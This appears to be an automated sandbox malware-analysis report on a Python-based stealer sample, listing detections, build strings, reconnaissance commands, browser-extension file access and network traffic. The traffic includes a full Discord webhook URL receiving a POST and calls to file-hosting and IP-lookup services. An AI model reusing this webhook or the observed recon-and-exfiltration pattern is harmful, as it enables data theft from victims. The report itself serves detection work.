            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe | Avira: detected
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe | Avira: detection malicious, Label: HEUR/AGEN.1306040
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe | ReversingLabs: Detection: 50%
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe | ReversingLabs: Detection: 50%

            Phishing

            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: Binary string: C:\A\34\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458402101.00007FFDA3AE1000.00000040.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460538535.00007FFDA5491000.00000040.00000001.01000000.0000000A.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459049746.00007FFDA4161000.00000040.00000001.01000000.0000000B.sdmp
            Source: Binary string: cryptography_rust.pdbc source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: Binary string: C:\A\34\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp
            Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456611424.00007FFDA32F1000.00000040.00000001.01000000.00000015.sdmp
            Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdb source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: crypto\bn\bn_ctx.cBN_CTX_startBN_CTX_getossl_ec_group_new_excrypto\ec\ec_lib.cEC_GROUP_copyEC_GROUP_set_generatorEC_GROUP_set_curveEC_GROUP_get_curveEC_GROUP_get_degreeEC_GROUP_check_discriminantEC_POINT_newEC_POINT_copyEC_POINT_set_to_infinityEC_POINT_set_Jprojective_coordinates_GFpEC_POINT_set_affine_coordinatesEC_POINT_get_affine_coordinatesEC_POINT_addEC_POINT_dblEC_POINT_invertEC_POINT_is_at_infinityEC_POINT_is_on_curveEC_POINT_cmpEC_POINT_mulEC_GROUP_get_trinomial_basisEC_GROUP_get_pentanomial_basisgroup_new_from_nameossl_ec_group_set_paramsencodingdecoded-from-explicitEC_GROUP_new_from_paramsgeneratorcrypto\evp\digest.cevp_md_ctx_new_exevp_md_ctx_free_algctxevp_md_init_internalEVP_DigestUpdatesizeEVP_DigestFinal_exassertion failed: mdsize <= EVP_MAX_MD_SIZEEVP_DigestFinalXOFxoflenEVP_MD_CTX_copy_exEVP_MD_CTX_ctrlmicalgssl3-msblocksizexofalgid-absentevp_md_from_algorithmupdatecrypto\evp\m_sigver.cUNDEFdo_sigver_initEVP_DigestSignUpdateEVP_DigestVerifyUpdateEVP_DigestSignFinalEVP_DigestSignEVP_DigestVerifyFinalEVP_DigestVerifycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Fri Oct 18 00:15:00 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
            Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\user\tb_digest.cuser_get_digestcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459264735.00007FFDA4331000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458028141.00007FFDA3711000.00000040.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_asyncio.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458199558.00007FFDA3A81000.00000040.00000001.01000000.00000012.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\python3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-1_1"not available source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119754812.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460318251.00007FFDA5471000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457310056.00007FFDA3531000.00000040.00000001.01000000.0000000F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_overlapped.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459813174.00007FFDA4DA1000.00000040.00000001.01000000.00000013.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\python310.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
            Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdbhP source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458841393.00007FFDA3FD1000.00000040.00000001.01000000.00000023.sdmp
            Source: Binary string: cryptography_rust.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_uuid.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459552942.00007FFDA4631000.00000040.00000001.01000000.0000001D.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp

            Spreading

            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7B2B683C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B69280 FindFirstFileExW,FindClose,0_2_00007FF7B2B69280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7B2B81874
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B69280 FindFirstFileExW,FindClose,2_2_00007FF7B2B69280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7B2B683C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7B2B81874
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D13229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFDB222F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,2_2_00007FFD93D13229
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg

            Networking

            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox View IP Address: 162.159.136.232 162.159.136.232
            Source: unknown DNS query: name: ip-api.com
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic HTTP traffic detected: GET /getServer HTTP/1.1
                Host: api.gofile.io
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Python/3.10 aiohttp/3.10.10
            Source: global traffic HTTP traffic detected: GET /json HTTP/1.1
                Host: ip-api.com
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Python/3.10 aiohttp/3.10.10
            Source: global traffic DNS traffic detected: DNS query: ip-api.com
            Source: global traffic DNS traffic detected: DNS query: discord.com
            Source: global traffic DNS traffic detected: DNS query: api.gofile.io
            Source: global traffic DNS traffic detected: DNS query: store1.gofile.io
            Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: unknown HTTP traffic detected: POST /api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3hw3K64VoD-wO_IKZJNJCs HTTP/1.1
                Host: discord.com
                Content-Type: application/json
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Python/3.10 aiohttp/3.10.10
                Content-Length: 1379
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.27.1
                Date: Mon, 28 Oct 2024 07:20:36 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 14
                Connection: close
                Access-Control-Allow-Origin: *
                Access-Control-Allow-Headers: Content-Type, Authorization
                Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                Access-Control-Allow-Credentials: true
                Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                Cross-Origin-Embedder-Policy: require-corp
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: cross-origin
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Content-Type-Options: nosniff
                X-DNS-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-XSS-Protection: 0
                ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 
00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 
00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 
00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
